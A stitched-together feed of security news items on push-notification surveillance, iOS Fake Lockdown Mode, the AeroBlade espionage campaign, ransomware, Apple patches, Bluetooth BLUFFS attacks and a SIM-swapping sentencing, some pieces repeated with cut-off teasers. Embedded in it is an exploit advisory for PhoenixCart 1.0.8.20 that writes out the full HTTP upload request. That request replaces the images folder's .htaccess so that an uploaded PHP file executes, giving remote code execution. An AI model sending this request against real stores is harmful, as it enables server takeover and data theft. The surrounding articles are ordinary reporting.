Unspecified governments have demanded mobile push notification records from Apple and Google users to pursue people of interest, according to U.S. Senator Ron Wyden.
"Push notifications are alerts sent by phone apps to users' smartphones," Wyden said.
"These alerts pass through a digital post office run by the phone operating system provider -- overwhelmingly Apple or Google. Because of

Unspecified governments have demanded mobile push notification records from Apple and Google users to pursue people of interest, according to U.S. Senator Ron Wyden.

"Push notifications are alerts sent by phone apps to users' smartphones," Wyden said.

"These alerts pass through a digital post office run by the phone operating system provider -- overwhelmingly Apple or Google. Because of that structure, the two companies have visibility into how their customers use apps and could be compelled to provide this information to U.S. or foreign governments."

Wyden, in a letter to U.S. Attorney General Merrick Garland, said both Apple and Google confirmed receiving such requests but noted that information about the practice was restricted from public release by the U.S. government, raising questions about the transparency of legal demands they receive from governments.

When mobile apps for Android and iOS send push notifications to users' devices, they are routed through Apple and Google's own infrastructure known as the Apple Push Notification (APN) service and Firebase Cloud Messaging, respectively. Microsoft and Amazon have similar systems in place called Windows Push Notification Service (WNS) and Amazon Device Messaging (ADM).

UPCOMING WEBINAR

Cracking the Code: Learn How Cyber Attackers Exploit Human Psychology

Ever wondered why social engineering is so effective? Dive deep into the psychology of cyber attackers in our upcoming webinar.

Join Now

As a result, the letter alleges that both companies can be compelled by governments to hand over the information. It's currently not clear which governments have sought notification data from Apple and Google.

That said, the U.S. is one among them, according to the Washington Post, which found more than two dozen search warrant applications related to federal requests for push notification data.

"The data these two companies receive includes metadata, detailing which app received a notification and when, as well as the phone and associated Apple or Google account to which that notification was intended to be delivered," the letter read.

"In certain instances, they also might also receive unencrypted content, which could range from backend directives for the app to the actual text displayed to a user in an app notification."

It also urged that Apple and Google should be permitted to disclose whether they have facilitated this practice, and if so, publish aggregate statistics about the number of demands they receive, and notify specific customers about demands for their data.

In a statement shared with Reuters, which first reported the development, Apple said the letter gave them the "opening" they needed to share more details about how governments monitored push notifications.

"When users allow an application they have installed to receive push notifications, an Apple Push Notification Service (APNs) token is generated and registered to that developer and device," Apple now notes in its updated Legal Process Guidelines document \[PDF\].

"Some apps may have multiple APNs tokens for one account on one device to differentiate between messages and multi-media. The Apple ID associated with a registered APNs token may be obtained with a subpoena or greater legal process."

Google, meanwhile, noted that it already publishes this information in its transparency reports although it's not specifically broken down by government requests for push notification records.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Governments May Spy on You by Requesting Push Notifications from Apple and Google

Governments can access records related to push notifications from mobile apps by requesting that data from Apple and Google, according to details in court records and a US senator.

If you have push notifications turned on for sensitive apps, you may want to reconsider your settings.

The United States government and foreign law enforcement can demand Apple and Google share metadata associated with push notifications from apps on iOS and Android, according to a US senator and court records reviewed by WIRED. These notifications can reveal which apps a person uses, along with other information that may be pertinent to law enforcement investigations.

US Senator Ron Wyden, an Oregon Democrat, highlighted the government surveillance technique in a letter sent to the US Department of Justice (DOJ) today. Wyden is specifically asking the DOJ to allow Apple and Google to discuss government requests for push notification records with their users, which Wyden says the US government has required them to keep secret thus far.

“In the spring of 2022, my office received a tip that government agencies in foreign countries were demanding smartphone ‘push’ notification records from Google and Apple,” Wyden wrote in the letter, which was first reported by Reuters. “My staff have been investigating this tip for the past year, which included contacting Apple and Google. In response to that query, the companies told my staff that information about this practice is restricted from public release by the government.”

App developers deliver push notifications using Apple’s Push Notification Service on iOS or Google’s Firebase Cloud Messaging on Android. Each user of an app is assigned a “push token,” which is transferred between the app and the mobile operating system’s push notification service. Push tokens are not permanently assigned to a single user, and new tokens may be generated when a person reinstalls an app or switches to a new device.

To identify a person of interest and whom they may have been communicating with, law enforcement must first go to an app developer to obtain the relevant push token and then bring it to the operating system maker—Apple or Google—and request information on which account the token is associated with. This puts the tech giants in “a unique position to facilitate government surveillance of how users are using particular apps,” Wyden writes.

According to Wyden, the records that governments can obtain from Apple and Google include metadata that reveals which apps a person has used, when they’ve received notifications, and the phone associated with a particular Google or Apple account. The content of push notifications is not included in this information, but, for at least some apps, law enforcement could obtain information about the content of specific pushes through additional requests based on the information from the push tokens.

While Wyden’s letter says that governments outside the US have requested people’s push notification records, the Federal Bureau of Investigation (FBI) has done so as well. A February 2021 search warrant application submitted by an FBI agent to the US District Court in Washington, DC, requested details for two accounts controlled by Meta (then Facebook), specifically citing a request for push notification tokens. The search warrant request related to an investigation into a person accused of taking part in the January 6, 2021, attack on the US Capitol.

Meta, which owns Facebook, WhatsApp, and Instagram, did not immediately respond to WIRED’s request to comment. A spokesperson for Signal, the popular encrypted messaging app, also did not respond. The DOJ declined to comment.

Although Wyden is asking the DOJ to allow Apple and Google to discuss government requests for push notification records, the senator’s letter appears to have enabled them to do just that.

An Apple spokesperson tells WIRED that the company has updated its Law Enforcement Guidelines in its transparency report to reflect government requests for push notification records. The company will also begin to detail these requests in its next transparency report. Apple's updated rules for police requests say push notification records “may be obtained with a subpoena or greater legal process.”

“Apple is committed to transparency and we have long been a supporter of efforts to ensure that providers are able to disclose as much information as possible to their users,” Apple says in a statement. “In this case, the federal government prohibited us from sharing any information and now that this method has become public we are updating our transparency reporting to detail these kinds of requests.”

Google confirmed to WIRED that it receives requests for push notification records, but the company says it already includes these types of requests in its transparency reports. The company says requests from US-based law enforcement for push notification records require court orders with judicial approval.

“We were the first major company to publish a public transparency report sharing the number and types of government requests for user data we receive, including the requests referred to by Senator Wyden,” a Google spokesperson tells WIRED. “We share the senator’s commitment to keeping users informed about these requests.”

A WIRED review of Google’s most recent transparency report for the period between December 2019 and December 2022 found that it does not specifically break out government requests for push notification records, and Google confirmed that it aggregates this data in its transparency report.

Google’s transparency report shows that the US government requested Google Cloud Platform data from enterprise customers 175 times during the period, and of those, used a search warrant 13 times. It is unclear whether any of those requests for user data included push notification records—details that may, following Wyden’s letter, be revealed in the future.

_Additional reporting by William Turton and Dhruv Mehrotra._

_Updated at 1:30 pm ET, December 6, 2023, to note that the DOJ has declined to comment on Wyden's letter and to add additional details about Apple's updated rules for law enforcement regarding requests for push notification records._

_Updated at 3:50 pm ET, December 6, 2023, to add details about Google's legal requirement for law enforcement requests for push notification records._

Police Can Spy on Your iOS and Android Push Notifications

CE Phoenixcart version 1.0.8.20 suffers from a remote shell upload vulnerability.

## Title: PhoenixCart-1.0.8.20-File-Upload-Bypass-override-htaccess-security-RCE  
## Author: nu11secur1ty  
## Date: 12/06/2023  
## Vendor: https://phoenixcart.org/index.php  
## Software: https://github.com/CE-PhoenixCart/PhoenixCart/archive/master.zip  
## Reference: https://portswigger.net/web-security/file-upload,  
https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload

## Description:  
The Categories/Products Product Images upload function, is ABSOLUTELY  
NOT SANITIZING WELL for file uploading from any type of extension!  
In this case, you can see a bypassing of .HTACCESS SECURITY file and  
uploading an info.php exploit file which info.php can be executed from  
everywhere for dumping the all information about the server! This can  
be done on the demo server! Please do not do this! I am a Penetration  
Tester, not a stupid cracker, and that's why I downloaded it,  
installed it, and tested it!  
If you want to test it yourself please download it, install it, and test it!  
Thank you all!

STATUS: HIGH-CRITICAL Vulnerability  
[+]Exploit execution:  
```POST  
POST /PhoenixCart/admin/catalog.php?cPath=&action=update_product&pID=10 HTTP/1.1  
Host: pwnedhost7.com  
Content-Length: 2952  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://pwnedhost7.com  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryeDPXR7DpYcn3eWA1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Referer: http://pwnedhost7.com/PhoenixCart/admin/catalog.php?cPath=&pID=10&action=new_product  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Cookie: cepcAdminID=ukrk3ssr0jd6iqsnn9ofuccmbt  
Connection: close

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="formid"

733e378dc8154accdbfd80762cc385f48d5566560ac3b264db19393f9beb268e  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_date_added"

2023-12-06 11:36:36  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_status"

1  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_quantity"

0  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_date_available"

2023-12-14 00:00:00  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="manufacturers_id"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_model"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_tax_class_id"

1  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_price"

1000.0000  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_price_gross"

1070  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_weight"

1.00  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_gtin"

00000000000001  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_name[1]"

pwned  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_description[1]"

pwned your services  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_url[1]"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_seo_title[1]"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_seo_description[1]"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_seo_keywords[1]"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_image"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_image_large_1";  
filename=".htaccess"  
Content-Type: application/octet-stream

# $Id$  
#  
# This is used to restrict access to this folder to anything other  
# than images

# Prevents any script files from being accessed from the images folder  
<FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$">  
  <IfModule mod_authz_core.c>  
    # Require all denied  
  </IfModule>

  <IfModule !mod_authz_core.c>  
    Order Deny,Allow  
    # Deny from all  
    Allow from all  
  </IfModule>  
</FilesMatch>

Options -Indexes

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_image_htmlcontent_1"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1--

```

[+]Response:  
```PHP  
GET /PhoenixCart/images/info.php HTTP/1.1  
Host: pwnedhost7.com  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Connection: close  
```

## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/CE-Phoenix/2023/PhoenixCart-1.0.8.20)

## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/12/phoenixcart-10820-file-upload-bypass.html)

## Time spent:  
00:17:00

--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and  
https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
                          nu11secur1ty <http://nu11secur1ty.com/>

--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html  
https://cxsecurity.com/ and https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
                          nu11secur1ty <http://nu11secur1ty.com/>

CE Phoenixcart 1.0.8.20 Shell Upload

By Waqas
iOS Security Flaw: Fake Lockdown Mode Can Be Used to Trick Users, Leaving Them Exposed.
This is a post from HackRead.com Read the original post: Fake Lockdown Mode Exposes iOS Users to Malware Attacks

It turns out that visually mimicking this Fake Lockdown Mode without incorporating any of the original mode’s security features is possible.

Cybersecurity researchers at Jamf Threat Labs have discovered a new technique that allows malware to bypass **Lockdown Mode** on iOS devices. For your information, Lockdown Mode is a security feature introduced by Apple in iOS 16 to limit certain features/functions on an iOS device so that compromising the device becomes difficult for attackers.

Researchers found that the mode’s primary control is through user-space components, and it isn’t integrated deeply into the iOS kernel. This flaw offers threat actors an opportunity for malware to bypass the Lockdown Mode’s restrictions by altering the user’s default database or using method hooking techniques.

Jamf Threat Labs’ researchers **noted** that visually mimicking this Fake Lockdown Mode without providing any of the original mode’s security features is possible. It is worth noting that successful implementation of this technique is possible if the device is already compromised.

What happens is that when a user activates Lockdown Mode through the Settings app, the method is triggered, which initiates a sequence of actions, including disabling shared albums, link previews, developer mode, and enabling USB restricted mode. Additionally, it sets the LDMGlobalEnabled key in the user’s default database to “YES,” indicating that Lockdown Mode is active.

Simply put, on an already infiltrated device, a hacker can cause Lockdown Mode to be “bypassed” when the user triggers its activation. So, a user would think their device is in Lockdown Mode, but it is not and will remain vulnerable to attacks.

In their demo video, researchers created a scenario where malware intercepts Lockdown Mode activation, and instead of triggering the expected sequence, it creates a file titled “/fakelockdownmode\_on.”

Then, it initiates a user space reboot and tricks the system into believing that the Lockdown Mode is active. The researchers could maintain control over Lockdown Mode by manipulating the device’s reboot process. The malware could continue to run and monitor the user’s activity, even if they had taken steps to safeguard their device.

The researchers also manipulated Lockdown Mode in Safari, one of the most commonly used applications on iOS devices. By hooking into Safari’s code, they forced the system to think that Lockdown Mode was always enabled, even when it wasn’t.

Researchers also showed how to activate Lockdown Mode in Settings and disable it without the user’s knowledge. They could view PDF files in Safari, which isn’t allowed when Lockdown Mode is truly enabled.

Lockdown Mode is a practical feature in certain situations, such as the **BLASTPASS** zero-click exploit identified in September 2023. However, this finding reveals that it isn’t foolproof, and it is possible to manipulate it to bypass security measures on compromised devices.

Apple **addressed** the vulnerability in iOS 17 by elevating Lockdown Mode to kernel level. Still, researchers are warning users to remain cautious and take steps to protect their devices. This includes using strong passwords and keeping devices updated with the latest security patches.

****_RELATED ARTICLES_****

1.  **Apple Safari Safest, Google Chrome Riskiest Browser of 2022**
2.  **Update NOW! Pegasus Spyware Exploiting iPhones on Latest iOS**
3.  **Apple issues iPhone software update after fake police ransomware scam**

Fake Lockdown Mode Exposes iOS Users to Malware Attacks

A new "post-exploitation tampering technique" can be abused by malicious actors to visually deceive a target into believing that their Apple iPhone is running in Lockdown Mode when it's actually not and carry out covert attacks.
The novel, detailed by Jamf Threat Labs in a report shared with The Hacker News, "shows that if a hacker has already infiltrated your device, they can cause

Mobile Security / Spyware

A new "post-exploitation tampering technique" can be abused by malicious actors to visually deceive a target into believing that their Apple iPhone is running in Lockdown Mode when it's actually not and carry out covert attacks.

The novel, detailed by Jamf Threat Labs in a report shared with The Hacker News, "shows that if a hacker has already infiltrated your device, they can cause Lockdown Mode to be 'bypassed' when you trigger its activation."

In other words, the goal is to implement Fake Lockdown Mode on a device that's compromised by an attacker through other means, such as unpatched security flaws that can trigger execution of arbitrary code.

UPCOMING WEBINAR

Learn Insider Threat Detection with Application Response Strategies

Discover how application detection, response, and automated behavior modeling can revolutionize your defense against insider threats.

Join Now

Lockdown Mode, introduced by Apple last year with iOS 16, is an enhanced security measure that aims to safeguard high-risk individuals from sophisticated digital threats such as mercenary spyware by minimizing the attack surface.

What it doesn't do is prevent the execution of malicious payloads on a compromised device, thereby allowing a trojan deployed on it to manipulate Lockdown Mode and give users an illusion of security.

"In the case of an infected phone, there are no safeguards in place to stop the malware from running in the background, whether the user activates Lockdown Mode or not," security researchers Hu Ke and Nir Avraham said.

The fake Lockdown Mode is accomplished by hooking functions – e.g., setLockdownModeGloballyEnabled, lockdownModeEnabled, and isLockdownModeEnabledForSafari – that are triggered upon activating the setting so as to create a file called "/fakelockdownmode\_on" and initiate a userspace reboot, which terminates all processes and restarts the system without touching the kernel.

This also means that a piece of malware implanted on the device sans any persistence mechanism will continue to exist even after a reboot of this kind and surreptitiously spy on its users.

What's more, an adversary could alter the Lockdown Mode on the Safari web browser to make it possible to view PDF files, which are otherwise blocked when the setting is turned on.

"Since iOS 17, Apple has elevated Lockdown Mode to kernel level," the researchers said. "This strategic move is a great step in enhancing security, as changes made by Lockdown Mode in the kernel typically cannot be undone without undergoing a system reboot, thanks to existing security mitigations."

The disclosure from Jamf arrives nearly four months after it demonstrated another novel method on iOS 16 that could be abused to fly under the radar and maintain access to an Apple device by tricking the victim into thinking their device's Airplane Mode is enabled.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Warning for iPhone Users: Experts Warn of Sneaky Fake Lockdown Mode Attack

Aeroblade flew under the radar, slicing through detection checks on a quest to steal sensitive commercial data.

Source: Phil McDonald via Alamy Stock Photo

A US aerospace company was recently subjected to a nearly yearlong commercial cyberespionage campaign, carried out by a seemingly new threat actor researchers have named "AeroBlade."

Unlike the high-stakes aerospace espionage carried out by major nation-state and ransomware groups in recent years, this latest bout, documented last week by Blackberry, follows a characteristically old script: a phishing bait-and-switch, template injection, VBA macro code, and so on.

Though old hat, the campaign — split into a testing (September 2022) and execution phase (July 2023) — managed to remain undetected for the better part of a year thanks to thorough anti-analysis protections.

The ultimate success of the campaign, and the nature of any data which might have been accessed, is not yet known.

**Aerospace Espionage, via Word**

The two attacks began, as so many before it have, with lure documents encased in phishing emails.

Once clicked, the attachments revealed Microsoft Word documents with scrambled text. The documents also contained a suspicious header: "SOMETHING WENT WRONG Enable Content to load the document."

Mimicking the macros notifications of old, the false flag lured victims into clicking and, unwittingly, retrieving and executing a malicious Microsoft Word template (DOTM) file. Injected in the template was a legible decoy document, as well as the instructions for a second-stage infection.

The final payload at the end of this chain was a dynamic link library (DLL) file acting as a reverse shell. The payload collected and exfiltrated system information and directories, and established persistence by creating a task in Windows Task Scheduler, to trigger every morning at 10:10 AM local time.

**Developing Stealth Techniques**

After its initial "test" attack, AeroBlade returned for real with a series of more advanced stealth techniques built into its payload.

The group's staying power may be at least partly attributed to how careful it was in, for example, diligently checking for characteristic signs of a sandbox environment or antivirus software, and also the many ways in which it obfuscated its malicious code.

For example, the executable used custom encoding for each string, and API hashing with MurmurHash to conceal how it used Windows functions. It also came fitted with a number of anti-disassembly techniques including control flow obfuscation, splicing data into code, and using dead-code executed instructions — code which gets executed, but whose result has no bearing on the rest of the program — to throw off analysts.

Given all of the facts of the case, the researchers concluded "with a high degree of confidence that this was a commercial cyberespionage campaign. Its purpose was most likely to gain visibility over the internal resources of its target in order to weigh its susceptibility to a future ransom demand."

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

'AeroBlade' Group Hacks US Aerospace Company

This week on the Lock and Code podcast, we speak with Allan Liska about why a ransomware group tattled on its own victim, and what to expect next year.

_This week on the Lock and Code podcast…_

Like the grade-school dweeb who reminds their teacher to assign tonight’s homework, or the power-tripping homeowner who threatens every neighbor with an HOA citation, the ransomware group ALPHV can now add itself to a shameful roster of pathetic, little tattle-tales.

In November, the ransomware gang ALPHV, which also goes by the name Black Cat, notified the US Securities and Exchange Commission about the Costa Mesa-based software company MeridianLink, alleging that the company had failed to notify the government about a data breach. Under newly announced rules by the US Securities and Exchange Commission (SEC), public companies will be expected to notify the government agency about “material cybersecurity incidents” within four days of determining whether such an incident could have impacted the company’s stock prices or any investment decisions from the public.

According to ALPHV, MeridianLink had violated that rule. But how did ALPHV know about this alleged breach?

Simple. They claimed to have done it.

“It has come to our attention that MeridianLink, in light of a significant breach compromising customer data and operational information, has failed to file the requisite disclosure under Item 1.05 of Form 8-K within the stipulated four business days, as mandated by the new SEC rules,” wrote ALPHV in a complaint that the group claimed to have filed with the US government.

The victim, MeridianLink, refuted the claims. According to a MeridianLink spokesperson, while the company confirmed a cybersecurity incident, it denied the severity of the incident.

“Based on our investigation to date, we have identified no evidence of unauthorized access to our production platforms, and the incident has caused minimal business interruption,” a MeridianLink spokesperson said at the time. “If we determine that any consumer personal information was involved in this incident, we will provide notifications as required by law.”

This week on the Lock and Code podcast with host David Ruiz, we speak to Recorded Future intelligence analyst Allan Liska about what ALPHV could hope to accomplish with its SEC complaint, whether similar threats have been made in the past under other regulatory regime, and what organizations everywhere should know about ransomware attacks going into the new year. One big takeaway, Liska said, is that attacks are getting bigger, bolder, and brasher.

“There are no protections anymore,” Liska said. “For a while, some ransomware actors were like, ‘No, we won’t go after hospitals, or we won’t do this, or we won’t do that.’ Those protections all seem to have flown out the window, and they’ll go after anything and anyone that will make them money. It doesn’t matter how small they are or how big they are.”

Liska continued:

> “We’ve seen ransomware actors go after food banks. You’re not going to get a ransom from a food bank. Don’t do that.”

Tune in today to listen to the full conversation.

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Why a ransomware gang tattled on its victim, with Allan Liska: Lock and Code S04E24 

Apple has released an emergency security update for two zero-day vulnerabilities which may have already been exploited.

Apple has released emergency security updates for iOS 17.1.2 and iPadOS 17.1.2 to patch for two zero-day vulnerabilities that may have been actively exploited.

Apple said both vulnerabilities were in the WebKit component, which is the engine that powers Safari browser on Macs as well as all browsers on iPhones and iPads. It is also the web browser engine used by Mail, App Store, and many other apps on macOS, iOS, and Linux.

The updates are available for the following:

*   iPhone XS and later
*   iPad Pro 12.9-inch 2nd generation and later
*   iPad Pro 10.5-inch
*   iPad Pro 11-inch 1st generation and later
*   iPad Air 3rd generation and later
*   iPad 6th generation and later
*   iPad mini 5th generation and later.
*   macOS Sonoma 14.1.2
*   Safari 17.1.2.

The updates may already have reached you if you automatically update, but it doesn’t hurt to check if your device is at the latest update level.

If a Safari update is available for your device, you can get it by updating your iPhone or iPad or updating your Mac.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Update your iPhones! Apple fixes two zero-days in iOS 

New research has unearthed multiple novel attacks that break Bluetooth Classic's forward secrecy and future secrecy guarantees, resulting in adversary-in-the-middle (AitM) scenarios between two already connected peers.
The issues, collectively named BLUFFS, impact Bluetooth Core Specification 4.2 through 5.4. They are tracked under the identifier CVE-2023-24023 (CVSS score: 6.8)

New research has unearthed multiple novel attacks that break Bluetooth Classic's forward secrecy and future secrecy guarantees, resulting in adversary-in-the-middle (AitM) scenarios between two already connected peers.

The issues, collectively named **BLUFFS**, impact Bluetooth Core Specification 4.2 through 5.4. They are tracked under the identifier CVE-2023-24023 (CVSS score: 6.8) and were responsibly disclosed in October 2022.

The attacks "enable device impersonation and machine-in-the-middle across sessions by only compromising one session key," EURECOM researcher Daniele Antonioli said in a study published late last month.

This is made possible by leveraging two new flaws in the Bluetooth standard's session key derivation mechanism that allow the derivation of the same key across sessions.

UPCOMING WEBINAR

Learn Insider Threat Detection with Application Response Strategies

Discover how application detection, response, and automated behavior modeling can revolutionize your defense against insider threats.

Join Now

While forward secrecy in key-agreement cryptographic protocols ensures that past communications are not revealed, even if the private keys to a particular exchange are revealed by a passive attacker, future secrecy (aka backward secrecy) guarantees the confidentiality of future messages should the past keys get corrupted.

In other words, forward secrecy protects past sessions against future compromises of keys.

The attack works by weaponizing four architectural vulnerabilities, including the aforementioned two flaws, in the specification of the Bluetooth session establishment process to derive a weak session key, and subsequently brute-force it to spoof arbitrary victims.

The AitM attacker impersonating the paired device could then negotiate a connection with the other end to establish a subsequent encryption procedure using legacy encryption.

In doing so, "an attacker in proximity may ensure that the same encryption key is used for every session while in proximity and force the lowest supported encryption key length," the Bluetooth Special Interest Group (SIG) said.

"Any conforming BR/EDR implementation is expected to be vulnerable to this attack on session key establishment, however, the impact may be limited by refusing access to host resources from a downgraded session, or by ensuring sufficient key entropy to make session key reuse of limited utility to an attacker."

Furthermore, an attacker can take advantage of the shortcomings to brute-force the encryption key in real-time, thereby enabling live injection attacks on traffic between vulnerable peers.

The success of the attack, however, presupposes that an attacking device is within the wireless range of two vulnerable Bluetooth devices initiating a pairing procedure and that the adversary can capture Bluetooth packets in plaintext and ciphertext, known as the victim's Bluetooth address, and craft Bluetooth packets.

As mitigations, SIG recommends that Bluetooth implementations reject service-level connections on an encrypted baseband link with key strengths below 7 octets, have devices operate in "Secure Connections Only Mode" to ensure sufficient key strength, and pair is done via "Secure Connections" mode as opposed the legacy mode.

The disclosure comes as ThreatLocker detailed a Bluetooth impersonation attack that can abuse the pairing mechanism to gain wireless access to Apple macOS systems via the Bluetooth connection and launch a reverse shell.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New BLUFFS Bluetooth Attack Expose Devices to Adversary-in-the-Middle Attacks

By Waqas
In addition to his prison sentence, Amir Hossein Golshan, the culprit, has been ordered to pay $1,218,526 in restitution to his victims.
This is a post from HackRead.com Read the original post: US Man Jailed 8 Years for SIM Swapping and Apple Support Impersonation

Golshan’s schemes involved SIM swapping, social media account takeovers, Zelle payment fraud, and impersonating Apple Support personnel.

A 25-year-old man from downtown Los Angeles has been sentenced to 8 years in federal prison for orchestrating a series of online scams that defrauded hundreds of victims of over $740,000.

Amir Hossein Golshan (PDF) was convicted of one count of unauthorized access to a protected computer to obtain information, one count of wire fraud, and one count of accessing a computer to defraud and obtain value.

Golshan’s schemes involved SIM swapping, social media account takeovers, Zelle payment fraud, and impersonating Apple Support personnel. He used these methods to steal money, NFTs, cryptocurrency, and other valuable digital property from his victims.

> It looks like the SIM swapper who impersonated Apple Support to steal $386K worth of crypto and NFTs (BAYC 9012) from @Mr312 last year was just sentenced to 8 years in prison + ordered to pay $1.2M in restitution.
> 
> How do we know it’s his scammer?
> 
> In the DOJ press release they… pic.twitter.com/qBrWBpROVg
> 
> — ZachXBT (@zachxbt) November 30, 2023

In one instance, Golshan targeted a Los Angeles-based model and influencer with over 100,000 Instagram followers. He gained access to her Instagram account and impersonated her to her friends, requesting them to send him money through Zelle, PayPal, and other online payment platforms.

Several of the victim’s friends sent Golshan money, totalling thousands of dollars, believing they were sending money to the victim. In another instance, Golshan impersonated Apple Support personnel to gain unauthorized access to several victims’ Apple iCloud accounts. He then stole NFTs, cryptocurrency, and other valuable digital property from these accounts.

In another case, he stole an NFT valued at approximately $319,000 and approximately $70,000 worth of cryptocurrency from a victim. U.S. District Judge Otis D. Wright II, who sentenced Golshan, stated that his crimes went “beyond just money” and that they showed a “wanton cruelty” that caused the victims to live in a state of “constant fear and worry.”

According to the US Department of Justice’s press release on Monday, November 27, 2023, Golshan has been in federal custody since June 2023 for violating the terms of his pretrial release. In addition to his prison sentence, he is ordered to pay $1,218,526 in restitution to his victims.

1.  **Police Dismantle SIM Swapping Gang in Spain**
2.  **Indian police & Microsoft busts tech support scam centers**
3.  **10 SIM-swapping hackers nabbed for targeting US celebrities**
4.  **Authorities take down scam campaign impersonating the WHO**
5.  **Man hacks Indian tech support scam call center; leaks CCTV footage**

Tag

#apple